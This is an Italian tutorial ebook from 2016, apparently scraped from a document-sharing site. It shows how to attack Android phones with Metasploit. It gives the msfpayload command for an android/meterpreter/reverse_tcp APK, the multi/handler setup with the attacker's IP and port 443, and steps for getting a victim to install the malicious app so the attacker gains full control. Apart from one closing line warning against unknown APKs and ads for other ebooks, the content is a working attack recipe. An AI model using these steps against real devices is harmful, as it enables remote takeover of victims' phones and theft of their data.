Comments
Description
Transcript
attaccare android con metasploit
Attaccare Android con Metasploit ATTACCARE ANDROID CON METASPLOIT 1 Attaccare Android con Metasploit Attaccare Android con Metasploit Tutti i diritti sono riservati © Copyright 2016, Scarlhat http://scarlhat.it http://twitter.com/scarl_hat [email protected] 2 Attaccare Android con Metasploit In questo breve paper verranno illustrati i passi per l’attacco, via metasploit, ad uno smartphone basato su sistema Android. Al fine di una buona comprensione teniamo bene a mente queste utili informazioni iniziali, che ci accompagneranno per tutto il corso del tutorial: IP attacker: 192.168.8.94 Porta utilizzata: 443 Requisiti: 1. Il framework di Metasploit (abbiamo utilizzato Kali Linux 1.0.6 in questo tutoriall) 2. Telefono android (abbiamo utilizzato un HTC One android 4.4 KitKat) Procediamo all’hacking, passo dopo passo: 1. Apri il terminale (CTRL + ALT + T), fare riferimento al tutorial su come creare scorciatoie con la tastiera per Linux (nota di Christian: c'era un link a questo tutorial). 2. Utilizzeremo il payload di Metasploit Framework per creare una falla durante questo tutorial. msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> Come già detto, l'IP di chi attacca è 192.168.8.94, mentre qui sotto c'è il nostro screen che rappresenta il momento in cui viene eseguito il comando. 3 Attaccare Android con Metasploit 3. Dato che il nostro payload è un "reverse_tcp" (dove chi attacca si aspetta che la vittima si riconnetta alla macchina di chi attacca) questo ha bisogno di impostare un handler che si occupi delle connessioni in entrata dalla porta già specificata sopra. Scrivere msfconsole per aprire la console di Metasploit. Info: use exploit/multi/handler –> noi utilizzeremo l'handler di Metasploit set payload android/meterpreter/reverse_tcp –> assicuratevi che il payload sia lo stesso del secondo passo. 4. Successivamente abbiamo bisogno di configurare lo switch del payload di Metasploit che avevamo già specificato al passo 3. Info: set lhost 192.168.8.94 –> IP di chi attacca set lport 443 –> Porta per ascoltare(listen/ricevere) la connessione in ritorno (reverse connection). exploit –> inizia ad ascoltare la connessione in entrata 4 Attaccare Android con Metasploit 5. Chi attacca ha già il file APK ed ora inizierà a distribuirlo. 6. In breve, la vittima scarica l'APK dannoso e lo installa. Dopo che la vittima apre l'applicazione, la console Metasploit di chi sta attaccando dovrebbe visualizzare qualcosa di simile a ciò. 7. Significa che chi sta attaccando è già all'interno del telefono della vittima e può farne ciò che desidera. Conclusione: E’ sconsigliato installate file APK da fonti sconosciute. 5 Attaccare Android con Metasploit 6 Attaccare Android con Metasploit Backtrack rinato: KALI LINUX! Questo piccolo ebook si prefigge il compito di colmare le difficoltà iniziali che possono incombere con Kali. Quali l’istallazione, l’aggiornamento del sistema. Non mancheranno consigli e accorgimenti utili, nonché dritte su dove trovare materiale utile al fine di una sempre più completa preparazione. Navigare in anonimato sulla rete Una guida passo dopo passo per la navigazione anonima su internet. "Non lasciare traccie al tuo passaggio" antico motto romano, ripreso nel generale da Ovidio "Bene Vixit Qui Bene Latuit" (Ha vissuto bene chi ha saputo stare nascosto). Verranno qui trattate tutte le nozioni teoriche e pratiche riguardanti l'anonimato; quali socket, VPN, macchine virtuali ecc. 7 Attaccare Android con Metasploit I ferri del mestiere Toolbox In questo ebook andremo a scoprire tutti i tools fondamentali inclusi nella suite Kali Linux. La sicurezza informatica fondamentalmente si incentra i questi piccoli "attrezzi", dalla contenute dimensioni e funzioni, ma dal potenziale incredibilmente enorme. Nmap, Netcat, Wireshark, Aircrack-ng: scanning dei protocolli di rete, delle applicazioni, dei pacchetti, ecc... Ebooks disponibili gratuitamente su http://scarlhat.it 8